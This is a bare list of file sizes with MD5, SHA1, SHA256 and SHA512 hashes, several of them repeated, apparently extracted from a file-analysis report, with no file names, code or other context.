SHA256 3fe84ac298396ff9b3f194561fe0ca3541cd9f871dccc0b5bb5b70b453a6890d
SHA512 3c1a458b14f7d1c8722bddeeec892a9a70dd0bb9bf1dad9cfa4d92dd1d69011d0ed577f9e5a2d8286a83349d4e115b48b5e28423bec01f861070d0acda633b31

Filesize 2KB
MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Filesize 226B
MD5 916851e072fbabc4796d8916c5131092
SHA1 d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA256 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA512 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

Filesize 19KB
MD5 f146487a400566f838832a371a8b465f
SHA1 32b40fbed559b613f4e836fbebb19faea88c20b6
SHA256 11ab1c1e9b0679a0fd7f867e41f1c6be3d32a0ce1cbf27a6360e2cd529578fa1
SHA512 c417670919bf1662955b7a20d20080529f49260ea964b552726d770b2d8a28bb04815d46d10bb5929bb4740d3dc40e9cc44062cf9a351ebc246afb900f7d2bd5

Filesize 948B
MD5 a7ce8cefc3f798abe5abd683d0ef26dd
SHA1 b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA256 5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512 c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Filesize 1.4MB
MD5 bb86a343080f9f4696c250ef31a18d9d
SHA1 43b2193dcb1d56eac73ba88a7b461822074192d6
SHA256 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA512 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Filesize 1.4MB
MD5 bb86a343080f9f4696c250ef31a18d9d
SHA1 43b2193dcb1d56eac73ba88a7b461822074192d6
SHA256 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA512 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Filesize 3.7MB
MD5 f5c51e7760315ad0f0238d268c03c60e
SHA1 85ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256 ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512 d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Filesize 3.7MB
MD5 f5c51e7760315ad0f0238d268c03c60e
SHA1 85ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256 ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512 d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Filesize 455KB
MD5 ee0ad7cc2a5976a5c658da52092977a9
SHA1 c69b99d42a9f9886af74e6a75fd905a5d17d4792
SHA256 f0cc93428ff55575086b843e642c33283067a980fc9cb1f17afc3559b101ff1b
SHA512 ca7f8b1409156b7d1b143cfb33f64056a8c2a8ce401dc735c82828521922044f86680ca6c1b4b08955689c5ba11c94930fe64cce37258e621c7d47ee2dafea17

Filesize 455KB
MD5 ee0ad7cc2a5976a5c658da52092977a9
SHA1 c69b99d42a9f9886af74e6a75fd905a5d17d4792
SHA256 f0cc93428ff55575086b843e642c33283067a980fc9cb1f17afc3559b101ff1b
SHA512 ca7f8b1409156b7d1b143cfb33f64056a8c2a8ce401dc735c82828521922044f86680ca6c1b4b08955689c5ba11c94930fe64cce37258e621c7d47ee2dafea17

Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Filesize 2KB
MD5 4ac8a26e2cee1347880edccb47ab30ea
SHA1 a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256 de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
SHA512 fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a